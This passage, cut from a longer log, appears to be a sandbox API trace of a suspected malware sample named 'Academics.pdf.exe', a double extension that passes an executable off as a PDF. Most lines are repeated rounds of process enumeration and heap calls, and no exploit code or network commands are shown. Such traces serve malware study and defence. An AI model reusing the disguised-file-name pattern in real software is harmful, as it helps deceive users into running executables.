hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0291.493] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.494] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0291.495] CloseHandle (hObject=0x294) returned 1 [0291.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0291.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0291.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0291.495] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0291.495] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0291.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0291.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0291.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0291.495] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0291.498] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.499] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0291.500] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0291.501] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.501] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0291.503] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.504] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.505] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.506] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.506] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0291.507] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.508] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.509] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.510] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.511] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.512] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0291.513] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.514] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.515] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.515] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.516] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0291.517] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0291.518] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.519] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0291.520] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0291.521] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0291.522] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0291.523] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0291.524] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0291.525] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0291.526] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0291.527] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0291.528] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0291.529] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0291.530] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0291.542] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0291.547] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0291.548] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0291.549] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0291.550] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0291.551] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0291.552] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0291.553] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.554] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.555] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0291.556] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.557] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0291.562] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.563] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0291.564] CloseHandle (hObject=0x294) returned 1 [0291.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0291.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0291.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0291.564] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0291.565] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0291.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0291.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0291.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0291.565] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0291.567] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.568] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0291.569] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0291.570] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.571] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0291.572] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.572] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.573] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.574] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.575] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0291.576] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.577] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.578] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.578] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.579] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.580] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0291.581] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.581] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.582] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.582] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.583] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, 